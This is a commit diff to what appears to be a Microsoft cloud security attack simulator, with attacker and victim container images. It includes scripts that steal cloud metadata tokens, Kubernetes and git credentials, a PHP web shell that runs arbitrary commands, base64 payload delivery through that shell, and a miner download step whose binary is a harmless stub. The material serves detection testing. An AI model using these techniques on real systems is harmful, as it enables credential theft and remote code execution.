Image updates & disclaimer (#4)

* refined the images and scripts, and added copyrught headers to code files (shell and php)

* reduced noise in output

* moved disclaimer in php file out of the php brackets

* removed redundant environment variable

---------

Co-authored-by: REDMOND\lleizerovich <[email protected]>

Images/attacker/Dockerfile

@@ -2,7 +2,7 @@ FROM mcr.microsoft.com/cbl-mariner/base/core:2.0
 RUN tdnf -y update && tdnf -y install python3 curl && tdnf clean all
 COPY src/ /simulation
 WORKDIR /simulation
+RUN cp /bin/true xmrig
 RUN chmod +x attack.sh
 ENV SCENARIO=all
-ENV NAME=mdc-simulator
 CMD ["./attack.sh"]

Images/attacker/src/all-scenarios.sh

@@ -1,4 +1,7 @@
-#!/bin/sh
+#!/bin/bash
+
+# Copyright (c) Microsoft Corporation.
+# Licensed under the MIT License.
 
 # recon
 echo "--- Reconnaissance ---"
@@ -15,44 +18,57 @@ echo " "
 # lateral-mov
 echo "--- Lateral Movement ---"
 echo "Sending request to IMDS to retrieve cloud identity token"
-if (token=$(curl -s -H "Metadata-Flavor: Google" "http://169.254.169.254/computeMetadata/v1/instance/service-accounts/default/token"| grep -Po '"access_token":"\K.*?(?=")')); then
-    cloud="gcp"
-elif (awstoken=$(curl -sf -X PUT "http://169.254.169.254/latest/api/token" -H "X-aws-ec2-metadata-token-ttl-seconds: 21600")); then
-    cloud="aws"
+if token=$(curl -s -H "Metadata-Flavor: Google" "http://169.254.169.254/computeMetadata/v1/instance/service-accounts/default/token"| grep -Po '"access_token":"\K.*?(?=")'); then
+    cloud="GCP"
+elif awstoken=$(curl -sf -X PUT "http://169.254.169.254/latest/api/token" -H "X-aws-ec2-metadata-token-ttl-seconds: 21600"); then
+    cloud="AWS"
     roles=$(curl -s "http://169.254.169.254/latest/meta-data/iam/security-credentials" -H "X-aws-ec2-metadata-token: $awstoken")
     for role in $roles; do
         token=$(curl -s "http://169.254.169.254/latest/meta-data/iam/security-credentials/$role" -H "X-aws-ec2-metadata-token: $awstoken" | grep -Po '"Token" : "\K.*?(?=")')
-        test $token && echo "$cloud token for role : $token" | head -c 50 && echo "..."
     done
-    test $token  || echo "no token found"
 else
-    cloud="az"
-    token=$(curl -s -H Metadata:true "http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com" | grep -Po '"access_token":"\K.*?(?=")')
+    cloud="Azure"
+    subId=$(curl -s -H Metadata:true --noproxy "*" "http://169.254.169.254/metadata/instance/compute/subscriptionId?api-version=2017-08-01&format=text")
+    rg=$(curl -s -H Metadata:true --noproxy "*" "http://169.254.169.254/metadata/instance/compute/resourceGroupName?api-version=2017-08-01&format=text")
+    location=$(curl -s -H Metadata:true --noproxy "*" "http://169.254.169.254/metadata/instance/compute/location?api-version=2017-08-01&format=text")
+    cluster=$(echo $rg | grep -Po "[^_]+(?=_$location)")
+    identity="/subscriptions/$subId/resourcegroups/$rg/providers/Microsoft.ManagedIdentity/userAssignedIdentities/$cluster-agentpool"
+    imds_addr="http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com"
+    imds_res=$(curl -sf -H Metadata:true "$imds_addr" ||curl -sf -H Metadata:true "$imds_addr&msi_res_id=$identity")
+    token=$(echo $imds_res | grep -Po '"Access_token":"\K.*?(?=")')
 fi
-test $token && echo "$cloud token: $token" | head -c 50 && echo "..." || echo "no token found"
+test $token && echo "$cloud token: $token" | head -c 30 && echo "..." || echo "No token found"
 echo " "
 
 # secrets
 echo "--- Secrets Gathering ---"
-echo "searching for kubernetes service account token"
-if (test -f "/var/run/secret/kubernetes.io/serviceaccount/token"); then
-    echo "found Kubernetes service account in /var/run/secret/kubernetes.io/serviceaccount/token"
-    cat /var/run/secret/kubernetes.io/serviceaccount/token | head -c 50 && echo "..."
-    echo " "
+echo "Searching for sensitive files"
+git_creds_file=$(find / -path */.git-credentials 2>/dev/null)
+if (test -n $git_creds_file); then
+    git_creds=$(cat $git_creds_file)
+    echo "Found .git-credential at $git_creds_file: $git_creds"
+else
+    echo ".git-credential not found"
+fi
+echo " "
+kube_token_file="/var/run/secrets/kubernetes.io/serviceaccount/token"
+if (test -f $kube_token_file); then
+    kube_token=$(cat $kube_token_file | head -c 30 && echo "...")
+    echo "Found Kubernetes service account in $kube_token_file: $kube_token"
 else
     echo "Kubernetes service account token not found"
-    echo " "
 fi
-echo "looking for secrets in environment variables"
+echo " "
+echo "Looking for secrets in environment variables"
 case $cloud in 
     gcp)
-        set | grep GOOGLE_DEFAULT_CLIENT_SECRET= || echo "variable not found"
+        set | grep GOOGLE_DEFAULT_CLIENT_SECRET= || echo "No secrets found in environment variable"
         ;;
     aws)
-        set | grep AWS_SECRET_ACCESS_KEY= || echo "variable not found"
+        set | grep AWS_SECRET_ACCESS_KEY= || echo "No secrets found in environment variable"
         ;;
     *)
-        set | grep AZURE_CREDENTIAL_FILE= || echo "variable not found"
+        set | grep AZURE_CREDENTIAL_FILE= || echo "No secrets found in environment variable"
         ;;
     esac
 echo " "
@@ -63,5 +79,7 @@ echo "Optimizing host for mining"
 /sbin/modprobe msr allow_writes=on > /dev/null 2>&1
 touch /etc/ld.so.preload 
 echo "Downloading and running Xmrig crypto miner"
-curl -s "http://$NAME-attacker/xmrig" -o xmrig && chmod +x xmrig && ./xmrig
-echo " "
+curl -sO http://mdc-simulation-attacker/xmrig
+chmod +x xmrig  
+./xmrig
+echo " "

Images/attacker/src/attack.sh

@@ -1,6 +1,10 @@
 #!/bin/bash
+
+# Copyright (c) Microsoft Corporation.
+# Licensed under the MIT License.
+
 sleep 10
-echo "started at `date`"
+echo "Started at `date`"
 echo " "
 case $SCENARIO in
     recon)
@@ -14,28 +18,30 @@ case $SCENARIO in
         ;;
     crypto)
         attack_script=crypto.sh
-        python3 -m http.server 80 &
+        python3 -m http.server 80 > /dev/null 2>&1 &
+        sleep 2
         ;;
     all)
         attack_script=all-scenarios.sh
-        python3 -m http.server 80 &
+        python3 -m http.server 80 > /dev/null 2>&1 &
+        sleep 2
         ;;
     webshell)
         echo "--- Webshell ---"
-        echo "sending command \"whoami\" to victim"
-        curl -Gs --data-urlencode "cmd=whoami" "http://$NAME-victim/ws.php"
+        echo "Sending command \"whoami\" to victim"
+        curl -Gs --data-urlencode "cmd=whoami" "http://mdc-simulation-victim/ws.php" | sed '/<!--/,/-->/d'
         echo " "
-        echo "--- simulation completed ---"
+        echo "--- Simulation completed ---"
         exit
         ;;
     *)
         echo "No matching scenario found. exiting"
         exit
         ;;
     esac
-script_b64=`cat $attack_script | base64 -w0`
+script_b64=$(cat $attack_script | base64 -w0)
 echo "--- Webshell ---"
-echo "sending payload request to the victim pod"
+echo "Sending payload request to the victim pod"
 echo " "
-curl -Gs --data-urlencode "cmd=echo $script_b64| base64 -d| bash" "http://$NAME-victim/ws.php"
-echo "--- simulation completed ---"
+curl -Gs --data-urlencode "cmd=echo $script_b64| base64 -d| bash" "http://mdc-simulation-victim/ws.php"  | sed '/<!--/,/-->/d'
+echo "--- Simulation completed ---"

Images/attacker/src/crypto.sh

@@ -1,7 +1,14 @@
+#!/bin/bash
+
+# Copyright (c) Microsoft Corporation.
+# Licensed under the MIT License.
+
 echo "--- Cryptomining ---"
 echo "Optimizing host for mining"
 /sbin/modprobe msr allow_writes=on > /dev/null 2>&1
 touch /etc/ld.so.preload 
 echo "Downloading and running Xmrig crypto miner"
-curl -s "http://$NAME-attacker/xmrig" -o xmrig && chmod +x xmrig && ./xmrig
-echo " "
+curl -sO http://mdc-simulation-attacker/xmrig
+chmod +x xmrig  
+./xmrig
+echo " "

Images/attacker/src/lateral-mov.sh

@@ -1,15 +1,28 @@
-#!/bin/sh
+#!/bin/bash
+
+# Copyright (c) Microsoft Corporation.
+# Licensed under the MIT License.
+
 echo "--- Lateral Movement ---"
 echo "Sending request to IMDS to retrieve cloud identity token"
-if (token=$(curl -s -H "Metadata-Flavor: Google" "http://169.254.169.254/computeMetadata/v1/instance/service-accounts/default/token"| grep -Po '"access_token":"\K.*?(?=")')); then
-    cloud="gcp"
-elif (awstoken=$(curl -sf -X PUT "http://169.254.169.254/latest/api/token" -H "X-aws-ec2-metadata-token-ttl-seconds: 21600")); then
-    cloud="aws"
-    role=$(curl -s "http://169.254.169.254/latest/meta-data/iam/security-credentials" -H "X-aws-ec2-metadata-token: $awstoken")
-    token=$(curl -s "http://169.254.169.254/latest/meta-data/iam/security-credentials/$role" -H "X-aws-ec2-metadata-token: $awstoken" | grep -Po '"Token" : "\K.*?(?=")')
+if token=$(curl -s -H "Metadata-Flavor: Google" "http://169.254.169.254/computeMetadata/v1/instance/service-accounts/default/token"| grep -Po '"access_token":"\K.*?(?=")'); then
+    cloud="GCP"
+elif awstoken=$(curl -sf -X PUT "http://169.254.169.254/latest/api/token" -H "X-aws-ec2-metadata-token-ttl-seconds: 21600"); then
+    cloud="AWS"
+    roles=$(curl -s "http://169.254.169.254/latest/meta-data/iam/security-credentials" -H "X-aws-ec2-metadata-token: $awstoken")
+    for role in $roles; do
+        token=$(curl -s "http://169.254.169.254/latest/meta-data/iam/security-credentials/$role" -H "X-aws-ec2-metadata-token: $awstoken" | grep -Po '"Token" : "\K.*?(?=")')
+    done
 else
-    cloud="az"
-    token=$(curl -s -H Metadata:true "http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com" | grep -Po '"access_token":"\K.*?(?=")')
+    cloud="Azure"
+    subId=$(curl -s -H Metadata:true --noproxy "*" "http://169.254.169.254/metadata/instance/compute/subscriptionId?api-version=2017-08-01&format=text")
+    rg=$(curl -s -H Metadata:true --noproxy "*" "http://169.254.169.254/metadata/instance/compute/resourceGroupName?api-version=2017-08-01&format=text")
+    location=$(curl -s -H Metadata:true --noproxy "*" "http://169.254.169.254/metadata/instance/compute/location?api-version=2017-08-01&format=text")
+    cluster=$(echo $rg | grep -Po "[^_]+(?=_$location)")
+    identity="/subscriptions/$subId/resourcegroups/$rg/providers/Microsoft.ManagedIdentity/userAssignedIdentities/$cluster-agentpool"
+    imds_addr="http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com"
+    imds_res=$(curl -sf -H Metadata:true "$imds_addr" ||curl -sf -H Metadata:true "$imds_addr&msi_res_id=$identity")
+    token=$(echo $imds_res | grep -Po '"Access_token":"\K.*?(?=")')
 fi
-test $token && echo "$cloud token: $token" | head -c 50 && echo "..." || echo "no token found"
+test $token && echo "$cloud token: $token" | head -c 30 && echo "..." || echo "No token found"
 echo " "

Images/attacker/src/recon.sh

@@ -1,4 +1,8 @@
-#!/bin/sh
+#!/bin/bash
+
+# Copyright (c) Microsoft Corporation.
+# Licensed under the MIT License.
+
 echo "--- Reconnaissance ---"
 echo "Checking read permissions for other pods via SelfSubjectAccessReview api request"
 kubetoken=`cat /var/run/secrets/kubernetes.io/serviceaccount/token`

Images/attacker/src/secrets-and-files.sh

@@ -1,19 +1,32 @@
-#!/bin/sh
+#!/bin/bash
+
+# Copyright (c) Microsoft Corporation.
+# Licensed under the MIT License.
+
 echo "--- Secrets Gathering ---"
-echo "searching for kubernetes service account token"
-if (test -f "/var/run/secret/kubernetes.io/serviceaccount/token"); then
-    echo "found Kubernetes service account in /var/run/secret/kubernetes.io/serviceaccount/token"
-    cat /var/run/secret/kubernetes.io/serviceaccount/token | head -c 50 && echo "..."
+echo "Searching for sensitive files"
+git_creds_file=$(find / -path */.git-credentials 2>/dev/null)
+if (test -n $git_creds_file); then
+    git_creds=$(cat $git_creds_file)
+    echo "Found .git-credential at $git_creds_file: $git_creds"
+else
+    echo ".git-credential not found"
+fi
+echo " "
+kube_token_file="/var/run/secrets/kubernetes.io/serviceaccount/token"
+if (test -f $kube_token_file); then
+    kube_token=$(cat $kube_token_file | head -c 30 && echo "...")
+    echo "Found Kubernetes service account in $kube_token_file: kube_token"
 else
     echo "Kubernetes service account token not found"
 fi
 echo " "
-echo "looking for secrets in environment variables"
+echo "Looking for secrets in environment variables"
 if (`curl -sf -H "Metadata-Flavor: Google" "http://169.254.169.254/computeMetadata/v1/" -o /dev/null`); then
-    set | grep GOOGLE_DEFAULT_CLIENT_SECRET= || echo "variables not found"
+    set | grep GOOGLE_DEFAULT_CLIENT_SECRET= || echo "No secrets found in environment variable"
 elif (`curl -sf -X PUT "http://169.254.169.254/latest/api/token" -H "X-aws-ec2-metadata-token-ttl-seconds: 21600" -o /dev/null`); then
-    set | grep AWS_SECRET_ACCESS_KEY= || echo "variables not found"
+    set | grep AWS_SECRET_ACCESS_KEY= || echo "No secrets found in environment variable"
 else
-    set | grep AZURE_CREDENTIAL_FILE= || echo "variables not found"
+    set | grep AZURE_CREDENTIAL_FILE= || echo "No secrets found in environment variable"
 fi
 echo " "

Images/victim/Dockerfile

@@ -2,9 +2,9 @@ FROM mcr.microsoft.com/cbl-mariner/base/core:2.0
 RUN tdnf -y update && tdnf install -y nginx php php-fpm nmap curl && tdnf clean all
 RUN mkdir -p /run/php-fpm
 COPY src/ /var/www/html
-COPY files/ /files
+COPY files/ /home/user
 COPY cfg/nginx.conf /etc/nginx/nginx.conf
 COPY cfg/web.conf /etc/php-fpm.d/web.conf
 RUN mkdir /var/lib/nginx
-ENV NAME=mdc-simulation
+RUN chown nginx:nginx /var/www/html
 CMD ["sh", "-c", "php-fpm && nginx -g 'daemon off;'"]

Images/victim/cfg/nginx.conf

@@ -10,7 +10,7 @@ http {
     types_hash_max_size 4096;
     server {
         listen 80;
-        server_name localhost $NAME-victim;
+        server_name localhost mdc-simulation-victim;
         root /var/www/html;
         index index.php index.html index.htm;
         location ~ \.php$ {

Images/victim/files/.git-credentials

@@ -0,0 +1 @@
+https://user:[email protected]

Images/victim/src/ws.php

@@ -1 +1,5 @@
-<?php echo shell_exec($_GET['cmd'])?>
+<!-- Copyright (c) Microsoft Corporation.
+ Licensed under the MIT License. -->
+ <?php 
+    echo shell_exec($_GET['cmd']);
+?>